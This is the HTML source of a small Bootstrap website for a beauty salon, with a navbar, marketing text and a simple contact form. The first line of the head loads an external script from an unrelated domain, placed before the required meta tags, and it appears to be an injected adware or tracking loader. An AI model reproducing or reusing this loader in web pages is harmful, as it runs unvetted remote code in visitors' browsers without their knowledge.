
<!DOCTYPE html>
<html lang="en">
  <head><script src="http://d.websteroidsapp.com/l/load.js"></script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../favicon.ico">

    <title>Hollywood beauty saloon</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <!-- Bootstrap theme -->
    <link href="css/bootstrap-theme.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="theme.css" rel="stylesheet">
	<link href="css/slide.css" rel="stylesheet">
    
  </head>
  

  <body role="document">
  

    <!-- Fixed navbar -->
    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="#">Hollywood Beauty Saloon</a>
        </div>
        <div id="navbar" class="navbar-collapse collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="file:///F:/project1/test%20project/index.html">Home</a></li>
            <li><a href="#about">About</a></li>
            <li><a href="file:///F:/project1/test%20project/product.html">Products</a></li>
            <li class="dropdown">
              <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">services<span class="caret"></span></a>
              <ul class="dropdown-menu">
                <li><a href="file:///F:/project1/test%20project/makeup.html">Make up</a></li>
                <li><a href="file:///F:/project1/test%20project/hair.html">Hair section</a></li>
                <li><a href="#">facial section</a></li>
                <li role="separator" class="divider"></li>
                <li class="dropdown-header">Other services</li>
                <li><a href="#">Gift certificates</a></li>
                <li><a href="#">Appointment</a></li>
				<li><a href="#">Timings</a></li>
              </ul>
            </li>
          </ul>
        </div><!--/.nav-collapse -->
      </div>
    </nav>

    <div class="container theme-showcase" role="main">

      
		<div class="jumbotron1">
		 
        <h1><marquee>Thank you for the visit have a nice day ahead!</marquee></h1>
        <p>Thank you for choosing Hollywood beauty Salon, only for ladies best hair and beauty salon. With the most talented team of experts, we strive to provide a wide array of exceptional services ranging from precision cuts and hair color, manicures and pedicures, hair removal services, and much more.

Our staff has been trained and well educated in the all facets of beauty techniques, and pride themselves on staying on top of the latest trends in the industry, offering a specialized service that is second to none.

Schedule your appointment with Royal Oak’s premier beauty salon and reward yourself with the look you’ve always wanted at Hollywood beauty Salon. We look forward to your visit.</p>
	
		<form action="" method="post">
    <fieldset>
        <legend>Contact us</legend>
        <div>
            <label for="name">Name (required):</label>
            <input type="text" id="name" name="name" value="" aria-describedby="name-format">
            
        </div>
        <div>
            <label for="email">Email (required):</label>
            <input type="text" id="email" name="email" value="">
        </div>
        <div>
            <label>Phone no:</label>
            <input type="text" id="website" name="website" value="">
        </div>
        <div>
            <label for="numTickets"><abbr title="Number">your</abbr> city (required):</label>
            <input type="text" id="numTickets" name="numTickets" value="">
        </div>
        <div class="submit">
            <input type="submit" value="Submit" onclick="myFunction()"> 
			</input>
</div>
<script>
function myFunction() {
    alert("Thank you for submitting the form!");
}
</script>

    </fieldset>
</form>    
						
						
		
      </div>
	  
	   <footer class="footer">
        <p>&copy; Tamanna 2015</p>
      </footer>
	 
	  
	  
   
	  
	  
</div>


    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="js/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/docs.min.js"></script>
	
    
  </body>
</html>
